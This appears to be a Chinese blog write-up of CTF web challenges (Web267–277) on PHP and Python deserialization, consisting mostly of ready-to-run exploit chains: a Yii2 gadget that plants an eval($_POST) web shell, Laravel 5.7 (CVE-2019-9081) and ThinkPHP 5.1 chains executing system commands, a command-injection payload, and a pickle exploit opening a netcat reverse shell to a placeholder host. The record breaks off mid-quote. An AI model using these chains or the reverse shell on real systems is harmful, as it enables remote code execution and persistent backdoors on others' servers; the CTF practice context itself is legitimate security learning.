<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">yii</span>\<span class="title class_">rest</span> &#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">Action</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">public</span> $<span class="title class_">checkAccess</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">IndexAction</span></span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$func</span>, <span class="variable">$param</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;checkAccess = <span class="variable">$func</span>;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;id = <span class="variable">$param</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">yii</span>\<span class="title class_">web</span> &#123;</span><br><span class="line">    <span class="title class_">abstract</span> <span class="title class_">class</span> <span class="title class_">MultiFieldSession</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">public</span> $<span class="title class_">writeCallback</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">DbSession</span> <span class="keyword">extends</span> <span class="title">MultiFieldSession</span></span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$func</span>, <span class="variable">$param</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;writeCallback = [<span class="keyword">new</span> \yii\rest\<span class="title function_ invoke__">IndexAction</span>(<span class="variable">$func</span>, <span class="variable">$param</span>), <span class="string">&quot;run&quot;</span>];</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">yii</span>\<span class="title class_">db</span> &#123;</span><br><span class="line">    <span class="title class_">use</span> <span class="title class_">yii</span>\<span class="title class_">base</span>\<span class="title class_">BaseObject</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">BatchQueryResult</span></span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$_dataReader</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$func</span>, <span class="variable">$param</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;_dataReader = <span class="keyword">new</span> \yii\web\<span class="title function_ invoke__">DbSession</span>(<span class="variable">$func</span>, <span class="variable">$param</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> &#123;</span><br><span class="line">    $<span class="title class_">exp</span> = <span class="title class_">new</span> \<span class="title class_">yii</span>\<span class="title class_">db</span>\<span class="title class_">BatchQueryResult</span>(&#x27;<span class="title class_">shell_exec</span>&#x27;, &quot;<span class="title class_">echo</span> &#x27;&lt;?<span class="title class_">php</span> <span class="title class_">eval</span>(\$<span class="title class_">_POST</span>[1]);<span class="title function_ invoke__">phpinfo</span>();<span class="meta">?&gt;</span><span class="string">&#x27; &gt; /var/www/html/basic/web/1.php&quot;);</span></span><br><span class="line"><span class="string">    echo(base64_encode(serialize($exp)));</span></span><br><span class="line"><span class="string">&#125;</span></span><br></pre></td></tr></table></div></figure>

<p>payload:</p>
<blockquote>
<p>?r&#x3D;&#x2F;backdoor&#x2F;shell&amp;code&#x3D;TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czo3MzoiZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs&#x2F;PicgPiAvdmFyL3d3dy9odG1sL2Jhc2ljL3dlYi8xLnBocCI7fWk6MTtzOjM6InJ1biI7fX19</p>
</blockquote>

        <h3 id="Web269"   >
          <a href="#Web269" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web269" class="headerlink" title="Web269"></a>Web269</h3>
      <p>payload:<br>?r&#x3D;&#x2F;backdoor&#x2F;shell&amp;code&#x3D;TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czo3MzoiZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs&#x2F;PicgPiAvdmFyL3d3dy9odG1sL2Jhc2ljL3dlYi8xLnBocCI7fWk6MTtzOjM6InJ1biI7fX19</p>

        <h3 id="Web270"   >
          <a href="#Web270" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web270" class="headerlink" title="Web270"></a>Web270</h3>
      <p>payload:<br>?r&#x3D;&#x2F;backdoor&#x2F;shell&amp;code&#x3D;TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czo3MzoiZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs&#x2F;PicgPiAvdmFyL3d3dy9odG1sL2Jhc2ljL3dlYi8xLnBocCI7fWk6MTtzOjM6InJ1biI7fX19</p>
<p>姿势不用换就能出。可惜都是抄别的大佬的wp做的<br>当长个见识吧</p>

        <h3 id="Web271"   >
          <a href="#Web271" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web271" class="headerlink" title="Web271"></a>Web271</h3>
      <p>CVE-2019-9081，Laravel 5.7反序列化漏洞</p>
<p>也有现成的链子可以抄：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> </span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span>\<span class="title class_">Testing</span> &#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">PendingCommand</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">public</span> $<span class="title class_">test</span>;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$app</span>;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$command</span>;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$parameters</span>;</span><br><span class="line"> </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$test</span>, <span class="variable">$app</span>, <span class="variable">$command</span>, <span class="variable">$parameters</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;test = <span class="variable">$test</span>;                 <span class="comment">//一个实例化的类 Illuminate\Auth\GenericUser</span></span><br><span class="line">            <span class="variable language_">$this</span>-&gt;app = <span class="variable">$app</span>;                   <span class="comment">//一个实例化的类 Illuminate\Foundation\Application</span></span><br><span class="line">            <span class="variable language_">$this</span>-&gt;command = <span class="variable">$command</span>;           <span class="comment">//要执行的php函数 system</span></span><br><span class="line">            <span class="variable language_">$this</span>-&gt;parameters = <span class="variable">$parameters</span>;     <span class="comment">//要执行的php函数的参数  array(&#x27;id&#x27;)</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Faker</span> &#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">DefaultGenerator</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">protected</span> $<span class="title class_">default</span>;</span><br><span class="line"> </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$default</span> = <span class="literal">null</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="keyword">default</span> = <span class="variable">$default</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span> &#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">Application</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">protected</span> $<span class="title class_">instances</span> = [];</span><br><span class="line"> </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$instances</span> = []</span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;instances[<span class="string">&#x27;Illuminate\Contracts\Console\Kernel&#x27;</span>] = <span class="variable">$instances</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">namespace</span> &#123;</span><br><span class="line">    $<span class="title class_">defaultgenerator</span> = <span class="title class_">new</span> <span class="title class_">Faker</span>\<span class="title class_">DefaultGenerator</span>(<span class="title class_">array</span>(&quot;<span class="title class_">hello</span>&quot; =&gt; &quot;<span class="title class_">world</span>&quot;));</span><br><span class="line"> </span><br><span class="line">    <span class="variable">$app</span> = <span class="keyword">new</span> <span class="title class_">Illuminate\Foundation\Application</span>();</span><br><span class="line"> </span><br><span class="line">    <span class="variable">$application</span> = <span class="keyword">new</span> <span class="title class_">Illuminate\Foundation\Application</span>(<span class="variable">$app</span>);</span><br><span class="line"> </span><br><span class="line">    <span class="variable">$pendingcommand</span> = <span class="keyword">new</span> <span class="title class_">Illuminate\Foundation\Testing\PendingCommand</span>(<span class="variable">$defaultgenerator</span>, <span class="variable">$application</span>, <span class="string">&#x27;system&#x27;</span>, <span class="keyword">array</span>(<span class="string">&#x27;tac /f*&#x27;</span>));</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$pendingcommand</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>


        <h3 id="Web272"   >
          <a href="#Web272" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web272" class="headerlink" title="Web272"></a>Web272</h3>
      <p>怎么全是CVE 不想说话了</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>:   2021-05-05 22:27:03</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by:   h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2021-05-05 22:39:17</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">PhpParser</span>\<span class="title class_">Node</span>\<span class="title class_">Scalar</span>\<span class="title class_">MagicConst</span>&#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">Line</span> &#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title class_">namespace</span> <span class="title class_">Mockery</span>\<span class="title class_">Generator</span>&#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">MockDefinition</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">protected</span> $<span class="title class_">config</span>;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$code</span>;</span><br><span class="line"> </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$config</span>, <span class="variable">$code</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;config = <span class="variable">$config</span>;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;code = <span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Mockery</span>\<span class="title class_">Loader</span>&#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">EvalLoader</span>&#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title class_">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Bus</span>&#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">Dispatcher</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">protected</span> $<span class="title class_">queueResolver</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$queueResolver</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;queueResolver = <span class="variable">$queueResolver</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span>\<span class="title class_">Console</span>&#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">QueuedCommand</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">public</span> $<span class="title class_">connection</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$connection</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;connection = <span class="variable">$connection</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Broadcasting</span>&#123;</span><br><span class="line">    <span class="title class_">class</span> <span class="title class_">PendingBroadcast</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">protected</span> $<span class="title class_">events</span>;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$event</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$events</span>, <span class="variable">$event</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;events = <span class="variable">$events</span>;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;event = <span class="variable">$event</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span>&#123;</span><br><span class="line">    $<span class="title class_">line</span> = <span class="title class_">new</span> <span class="title class_">PhpParser</span>\<span class="title class_">Node</span>\<span class="title class_">Scalar</span>\<span class="title class_">MagicConst</span>\<span class="title class_">Line</span>();</span><br><span class="line">    <span class="variable">$mockdefinition</span> = <span class="keyword">new</span> <span class="title class_">Mockery\Generator\MockDefinition</span>(<span class="variable">$line</span>,<span class="string">&quot;&lt;?php system(&#x27;tac /f*&#x27;);&quot;</span>);</span><br><span class="line">    <span class="variable">$evalloader</span> = <span class="keyword">new</span> <span class="title class_">Mockery\Loader\EvalLoader</span>();</span><br><span class="line">    <span class="variable">$dispatcher</span> = <span class="keyword">new</span> <span class="title class_">Illuminate\Bus\Dispatcher</span>(<span class="keyword">array</span>(<span class="variable">$evalloader</span>,<span class="string">&#x27;load&#x27;</span>));</span><br><span class="line">    <span class="variable">$queuedcommand</span> = <span class="keyword">new</span> <span class="title class_">Illuminate\Foundation\Console\QueuedCommand</span>(<span class="variable">$mockdefinition</span>);</span><br><span class="line">    <span class="variable">$pendingbroadcast</span> = <span class="keyword">new</span> <span class="title class_">Illuminate\Broadcasting\PendingBroadcast</span>(<span class="variable">$dispatcher</span>,<span class="variable">$queuedcommand</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$pendingbroadcast</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>


        <h3 id="Web273"   >
          <a href="#Web273" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web273" class="headerlink" title="Web273"></a>Web273</h3>
      <p>跟上面一题一样</p>

        <h3 id="Web274"   >
          <a href="#Web274" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web274" class="headerlink" title="Web274"></a>Web274</h3>
      <p>thinkphp 5.1反序列化漏洞<br>纯抄wp</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">think</span>;</span><br><span class="line"><span class="keyword">abstract</span> <span class="class"><span class="keyword">class</span> <span class="title">Model</span></span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$append</span> = [];</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$data</span> = [];</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;append = [<span class="string">&quot;lin&quot;</span>=&gt;[<span class="string">&quot;calc.exe&quot;</span>,<span class="string">&quot;calc&quot;</span>]];</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;data = [<span class="string">&quot;lin&quot;</span>=&gt;<span class="keyword">new</span> <span class="title class_">Request</span>()];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Request</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$hook</span> = [];</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$filter</span> = <span class="string">&quot;system&quot;</span>;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$config</span> = [</span><br><span class="line">        <span class="comment">// 表单ajax伪装变量</span></span><br><span class="line">        <span class="string">&#x27;var_ajax&#x27;</span>         =&gt; <span class="string">&#x27;_ajax&#x27;</span>,  </span><br><span class="line">    ];</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;filter = <span class="string">&quot;system&quot;</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;config = [<span class="string">&quot;var_ajax&quot;</span>=&gt;<span class="string">&#x27;lin&#x27;</span>];</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;hook = [<span class="string">&quot;visible&quot;</span>=&gt;[<span class="variable language_">$this</span>,<span class="string">&quot;isAjax&quot;</span>]];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">think</span>\<span class="title class_">process</span>\<span class="title class_">pipes</span>;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">use</span> <span class="title">think</span>\<span class="title">model</span>\<span class="title">concern</span>\<span class="title">Conversion</span>;</span><br><span class="line"><span class="keyword">use</span> <span class="title">think</span>\<span class="title">model</span>\<span class="title">Pivot</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Windows</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$files</span> = [];</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;files=[<span class="keyword">new</span> <span class="title class_">Pivot</span>()];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">think</span>\<span class="title class_">model</span>;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">use</span> <span class="title">think</span>\<span class="title">Model</span>;</span><br><span class="line"> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Pivot</span> <span class="keyword">extends</span> <span class="title">Model</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">use</span> <span class="title">think</span>\<span class="title">process</span>\<span class="title">pipes</span>\<span class="title">Windows</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">base64_encode</span>(<span class="title function_ invoke__">serialize</span>(<span class="keyword">new</span> <span class="title class_">Windows</span>()));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></div></figure>


        <h3 id="Web275"   >
          <a href="#Web275" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web275" class="headerlink" title="Web275"></a>Web275</h3>
      <p>今天的CTF到此结束 明天再玩</p>
<p>好像是单纯的代码审计？</p>
<p>最关键的部分还是eval的部分，直接执行代码cat *f*就行</p>
<p>payload:</p>
<blockquote>
<p>?fn&#x3D;php;tac *f*</p>
</blockquote>

        <h3 id="Web276"   >
          <a href="#Web276" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web276" class="headerlink" title="Web276"></a>Web276</h3>
      <p>做不动了 想摆烂了<br>想去玩三色绘恋了</p>
<p>可恶</p>
<p>好像是要想办法让admin&#x3D;true?</p>
<p>看了大佬的wp，是条件竞争，做不了，顺理成章地摆烂了</p>

        <h3 id="Web277"   >
          <a href="#Web277" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web277" class="headerlink" title="Web277"></a>Web277</h3>
      <p>exp:</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">CTFshow</span>():</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (<span class="built_in">eval</span>,(<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;nc ip地址 端口 -e /bin/sh&#x27;).read()&quot;</span>,))</span><br><span class="line"> </span><br><span class="line">cs = CTFshow()</span><br><span class="line"> </span><br><span class="line">ctfshow_ser = pickle.dumps(cs)  <span class="comment">#不加s是文件</span></span><br><span class="line"><span class="built_in">print</span>(base64.b64encode(ctfshow_ser))</span><br></pre></td></tr></table></div></figure>

<blockquote>
<p>pickle.loads(m)是一个Python代码片段，其中pickle是Python标准库中的模块，用于序列化（将对象转换为字节流）和反序列化（将字节流转换回对象）Python对象。</p>
</blockquote>
<blockquote>
